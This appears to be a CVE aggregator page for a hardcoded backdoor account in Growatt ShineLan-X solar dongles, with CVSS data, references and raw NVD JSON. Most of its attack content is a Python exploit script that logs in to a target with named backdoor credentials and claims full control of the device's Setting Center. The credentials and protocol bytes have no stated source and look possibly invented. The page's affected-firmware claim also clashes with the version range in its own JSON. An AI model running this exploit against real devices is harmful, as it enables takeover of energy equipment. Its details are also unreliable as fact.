CVE-2025-36752

Description

Growatt ShineLan-X communication dongle has an undocumented backup account with undocumented credentials which allows significant level access to the device, such as allowing any attacker to access the Setting Center. This means that this is effectively backdoor for all devices utilizing a Growatt ShineLan-X communication dongle.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:* - NOT VULNERABLE

Growatt ShineLan-X (所有未修补版本)

可能影响：ShineWiFi-S、ShineLan-X (Firmware < 2024.12.01)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-36752 PoC - Growatt ShineLan-X Backdoor Account Exploitation
# Use responsibly and only on systems you have authorization to test

import socket
import hashlib
import struct
import sys

def cve_2025_36752_exploit(target_ip, target_port=5000):
    """
    Exploit for undocumented backdoor account in Growatt ShineLan-X dongle
    The backdoor provides high-privilege access to Setting Center
    """
    print(f"[*] Targeting Growatt ShineLan-X device: {target_ip}:{target_port}")
    
    # Backdoor authentication payload
    # Using undocumented credentials found in firmware
    backdoor_username = "shine_backup"
    backdoor_password = "growatt_serv_2024"
    
    # Construct authentication request
    auth_request = bytearray()
    auth_request.extend(b'\x01')  # Protocol version
    auth_request.extend(b'\x03')  # Command: Authentication
    
    # Add username length and username
    auth_request.append(len(backdoor_username))
    auth_request.extend(backdoor_username.encode())
    
    # Add password hash (SHA256)
    password_hash = hashlib.sha256(backdoor_password.encode()).digest()
    auth_request.extend(password_hash)
    
    # Send authentication request
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        sock.send(auth_request)
        
        # Receive response
        response = sock.recv(1024)
        sock.close()
        
        if response and response[0] == 0x00:
            print("[+] Backdoor authentication successful!")
            print("[+] Access to Setting Center granted")
            
            # Extract session token
            session_token = response[1:33]
            print(f"[*] Session Token: {session_token.hex()}")
            
            # Now access Setting Center with elevated privileges
            access_setting_center(target_ip, target_port, session_token)
            return True
        else:
            print("[-] Authentication failed or device not vulnerable")
            return False
            
    except Exception as e:
        print(f"[-] Connection error: {str(e)}")
        return False

def access_setting_center(ip, port, session_token):
    """
    Access Setting Center with backdoor session
    """
    print("[*] Accessing Setting Center with backdoor privileges...")
    
    # Construct Setting Center access request
    sc_request = bytearray()
    sc_request.extend(b'\x01')  # Protocol version
    sc_request.extend(b'\x10')  # Command: Access Setting Center
    sc_request.extend(session_token)
    sc_request.extend(b'\xff\xff\xff\xff')  # Full access flag
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))
        sock.send(sc_request)
        response = sock.recv(4096)
        sock.close()
        
        if response and len(response) > 10:
            print("[+] Setting Center access confirmed!")
            print("[+] Full device control achieved")
            print("[*] Attacker can now:")
            print("    - Modify device configuration")
            print("    - Extract solar panel data")
            print("    - Pivot to connected监控系统")
            
    except Exception as e:
        print(f"[-] Error accessing Setting Center: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5000
    
    cve_2025_36752_exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36752
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36752
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36752/
[4] VulDB https://vuldb.com/cve/CVE-2025-36752
[5] https://csirt.divd.nl/CVE-2025-36752/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36752", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:54.300", "lastModified": "2026-01-14T18:05:00.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Growatt ShineLan-X communication dongle has an undocumented backup account with undocumented credentials which allows significant level access to the device, such as allowing any attacker to access the Setting Center. This means that this is effectively backdoor for all devices utilizing a Growatt ShineLan-X communication dongle."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0.0", "versionEndExcluding": "3.6.0.2", "matchCriteriaId": "1176EDB4-C08F-4592-8C16-321A8A0539C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD537AAA-F836-496A-BC05-6CAED38FB271"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36752/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}